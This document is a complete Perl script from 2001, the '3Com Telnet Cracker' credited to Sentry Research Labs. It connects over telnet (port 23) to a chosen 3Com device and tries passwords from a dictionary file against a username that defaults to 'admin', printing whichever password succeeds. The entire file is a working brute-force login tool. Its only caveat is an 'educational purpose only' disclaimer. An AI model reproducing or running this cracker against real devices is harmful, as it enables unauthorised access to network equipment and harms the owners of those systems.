#!/usr/bin/perl -w

########################################################
#                                                      #
# 3Com Telnet Cracker v0.1b                            #
# -------------------------                            # 
#                                                      #
# Telnet implementation arcording to RFC 854           #
#                                                      #
# written 2001 by Siberian [www.sentry-labs.com]       #
#                                                      #
# Tested with:                                         # 
# Active Perl (Windows NT)                             # 
# Perl 5.stable (Slackware 3.6 & 7.1)                  # 
#                                                      # 
#    This Software is published under GPL v2           # 
#                                                      #
#         FOR EDUCATIONAL PURPOUSE ONLY!               #
#                                                      #
# SRL can't be held responsible for any damgae caused  #
# by the software, direct or inderectly to anything    #
# or anyone.                                           # 
#                                                      #
########################################################
     

use Socket;

sub guesspass {

$i=1;
$userh = $userf;
$userf = join '', $userf, chr(13), chr(10);

recv(SOCK,$ol,1,0);
while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){
    recv(SOCK,$ol,1,0);
}

while(defined($passwd = <FILE1>)) {
   chop($passwd);
   print ".";
while($i != 3) {
   if($ol eq "L"){ 
    send(SOCK,$userf,0); 
   }
   if($ol eq "P") { 
    $passwd = join '', $passwd, chr(13), chr(10);
    send(SOCK,$passwd,0); 
   }
   recv(SOCK,$ol,1,0);
   while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){
    recv(SOCK,$ol,1,0);
   }
   if($ol eq "M") {
     print "\n\nPassword for $userh is $passwd\n";
     exit 0;
   }
$i++
}
$i=1;
}
print "\n\nIt's sad but true, you failed.\n";
}


print "\n3Com Hardware Telnet Login Cracker, written by Siberian \- Sentry Research Labs\n\n";
print "Get the latest Version at www.sentry-labs.com\n\n";
$remote = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)";
$passf = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)";
$userf = shift || ($userf = "admin");

$iaddr = inet_aton($remote) or die "No target host computer found!";
$paddr = sockaddr_in(23, $iaddr);
$prot = getprotobyname('tcp');
socket(SOCK, AF_INET, SOCK_STREAM, $prot) or die "socket: $!";
connect(SOCK, $paddr) || die "Can't connect to target host!"; 

open(FILE1, "$passf") || die "Can't open Password list!";
recv(SOCK,$ol,1,0);
$bs = join '', chr(10),chr(13),chr(10);
send(SOCK, $bs, 0); 
guesspass();

close(FILE1);
close(SOCK);
exit 0;